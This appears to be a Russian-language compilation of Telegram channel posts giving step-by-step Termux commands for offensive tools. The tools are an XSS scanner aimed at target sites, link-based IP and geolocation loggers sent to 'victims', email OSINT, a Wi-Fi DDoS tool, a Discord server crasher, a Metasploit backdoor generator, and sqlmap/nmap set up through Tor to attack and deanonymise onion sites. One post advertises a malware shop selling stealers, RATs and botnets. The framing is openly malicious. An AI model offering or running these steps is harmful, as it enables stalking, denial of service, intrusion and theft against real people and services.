Поиск XSS на сайте через Termux

XSS (межсайтовый скриптинг) – одна из разновидностей атак на веб-системы.
XIRA - сканер уязвимости xss.

Установка
◾️ pkg update && pkg upgrade
◾️ pkg install git
◾️ pkg install python
◾️ git clone https://github.com/xadhrit/xira.git
◾️ cd xira
◾️ python -m pip install -r requirements.txt

Запуск
После длительной установки, мы можем запускать скрипт, указав URL атакуемого сайта, через ключ u:
◾️ python xira.py -u <url>

BIG BRO 5.0

BigBro 5.0 - это утилита в Termux для поиска местоположения людей которые перешли по вашей ссылке.
Радиус местоположения 1 - 10 метров.

Установка:
$ git clone https://github.com/Bafomet666/Bigbro
$ cd Bigbro
$ 7z x 'Big bro 5.0.7z'
$ cd 'Big bro 5.0'
$ chmod +x install.sh
$ bash termux_install.sh

В новой сессии запускаем:
$ ngrok
$ ngrok http 8080

Запуск:
$ python3 bigbro.py -t manual

@MalwareShopBot - единственный и первый магазин вредоносных ПО в Telegram от проекта @MalwareForum

Тут вы найдёте: ботнет, стиллер, РАТ, клиппер, лоадер, скрытый майнер, кейлогер, червь, андроид вирусы и многое другое.

DarkFly-Tool является инструментом установки для установки инструментов. этот инструмент делает его легким для вас. так что вам не нужно ввести клон git или искать репозиторий github. Вы только должны выбрать номер. какой инструмент вы хотите установить. Есть 530 инструментов, готовых к установке.

Установка:
$ pkg update
$ pkg upgrade
$ pkg install python2
$ pkg install git
$ git clone https://github.com/Ranginang67/DarkFly-Tool
$ cd DarkFly-Tool
$ python2 install.py

Использование:
$ cd
$ DarkFly

DDoS атака на Wi-Fi

WIFI-SHIT — утилита для ddos'a сетей wifi. Но для успешного ddos'a нужно быть подключенным к той сети wifi, которую желаем положить.

Инструкция:

$ pkg update
$ pkg install python
$ pkg install python2
$ pkg install git
$ git clone https://github.com/claprusshow/WIFI-SHIT
$ cd WIFI-SHIT
$ pip install -r requirements.txt
$ python2 WIFI-SHIT.py example.com 80 999999999

Теперь создаём 8 сессий, и во всех запускаем ddos wifi, не рекомендую на разные порты.

После этого wifi просто ляжет. Но если wifi рабоает дальше то можно создать 8 сессий и со всех запустить атаку.

👁 Пользуемся продвинутым IP Logger'ом

Салют, бандиты! Думаю, каждый хотя бы раз в жизни хотел набить ебало кому-либо по ту сторону экрана, поэтому прилагаю для вас отличный инструмент, который позволит получить ip-адрес и примерное расположение жертвы с точностью до 10 метров. Самая важная особенность инструмента — ссылки на логгер получаются максимально "скрытыми", следственно получить IP жертвы при должных навыках СИ не составит труда.

Заранее предупреждаю, для работы утилиты потребуется установленный Ngrok (версию для Termux можно найти здесь)

Установка

$ git clone https://github.com/Bafomet666/Bigbro
$ cd Bigbro
$ chmod +x install.sh
$ ./install.sh

Запуск

$ ngrock http 8080
$ python bigbro.py -t manual

После этого у yас откроется меню инструмента,в котором мы выбираем, как будем маскировать ссылку с логгером. Далее, генерируем ее и отсылаем жертве. Если жертва даст доступ к геолокации, то мы еще и получим координаты ее местоположения ✌️

📌Пробив почты в Termux!

Установка:

$ apt update
$ apt upgrade
$ apt install git python
$ git clone https://github.com/mxrch/GHunt
$ pip3 install -r requirements.txt
$ python check_and_gen.py

Запуск:

$ python hunt.py пример@gmail.com

👾Крашим дискорд сервера

Discord crasher – утилитa, которая может спокойно положить сервера дискорда.

Установка:

$ apt update
$ apt upgrade
$ apt install nano
$ apt install python3
$ pip3 install discord
$ pip3 install colorama
$ pip3 install requests
$ git clone https://github.com/GlUTEN-BASH/discord_crasher
$ cd discord_crasher

Настраиваем токен: Первым делом нам нужно отредактировать файл "modded.py", и в самом конце найти строку, в которую вставить свой токен:
"nano modded.py"

$ client.run токен

В утилите есть следующие комманды:

$ lol – автокраш сервера.
$ spam – спам сообщениями в определенном канале.
$ delroles – удаление всех ролей, что сможет бот.
$ supme – выдает роль с правами администратора тому, кто ввел команду. Также, необходимо указать место роли, желательно выше обычной роли пользователей.

Kithack

Это фреймворк, предназначенный для автоматизации процесса загрузки и установки различных инструментов тестирования на проникновение, со специальной опцией, позволяющей создавать кроссплатформенные бэкдоры с помощью Metasploit Framework.

apt update
apt install python3 python3-pip
git clone https://github.com/AdrMXR/KitHack.git
cd KitHack
bash install.sh
python3 KitHack.py
kithack

@termuxroot

Хотим увидеть вашу поддержку❤️
Нам сильно не хватает подписчиков и поддержи чтобы развивать этот проект дальше👀

Ps: рад что у нас есть олды❤️

Up

Адаптируем инструменты под атаки на onion-сайты

Несмотря на свою скрытность и шифрование, сайты в сети Tor работают практически также как и в clearnet. Соответственно на них также могут присутствовать различные уязвимости, с помощью которых можно нарушить работу ресурса или деанонимизировать его создателя, к примеру. А если некоторые процессы проведения атак универсальны для обоих типов сайтов, то и некоторые популярные инструменты можно также адаптировать для работы в даркнете. Рассмотрим, для примера, как настроить sqlmap и nmap для работы в сети Tor.

Установка:
$ sudo apt instal tor nmap proxychains

Делаем sqlmap анонимной:
1. Для начала запускаем сам Tor:
$ tor

2. Теперь мы можем выполнять команды просто дописывая в конец: "--tor --tor-type=SOCKS5":
$ python2 sqlmap.py -u http://test.onion/index.php?id=2 --tor --tor-type=SOCKS5

Анонимизируем сканирование nmap:
Для анонимизации сканирования через nmap используйте дополнительную утилиту "ProxyChains":
$ apt install proxychains

По умолчанию proxychains уже настроен на работу с Tor, поэтому для начала стандартного сканирования нужно ввести команду:
$ proxychains nmap -sT -PN -n -sV -p 21 test2vy6foxjlzsh.onion

@termuxroot